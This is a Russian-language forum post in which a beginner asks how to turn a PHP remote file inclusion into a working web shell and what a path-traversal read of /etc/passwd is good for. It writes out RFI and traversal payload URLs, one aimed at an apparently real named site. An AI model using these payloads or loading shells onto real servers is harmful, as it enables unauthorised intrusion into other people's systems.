сорри совсем за нубовские вопросы, но все же ... читаю-читаю, но пока многого не догоняю

вот допустим нашел я пхп инъекцию ( http://сайт/index.php?p=http://google.com )
ага, гугля отображается ... что дальше? вгружаем шелл.

на сервак залил файл шелла и пытаюсь инклудить
1) http://сайт/index.php?p=http://шелл.php - шел открывается, но показывает мой сервак ... получается скрипт выполняется на моем серваке!? и зачем мне это?

2) пробудем так (где-то читал) http://сайт/index.php?p=http://шелл.txt

тупо в окне браузера выдает содержание txt'шного файла ... так как же все-таки заинклудить шелл?


И еще вопросец:

Почему уязвиость вида
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
называют PHP - include'ом и вообще какой от нее толк? Пассов же там нет никаких ... А что мы можем, просто узнав, какие файлы на серваке??

Всем заранее спасибо, прошу сильно меня не пинать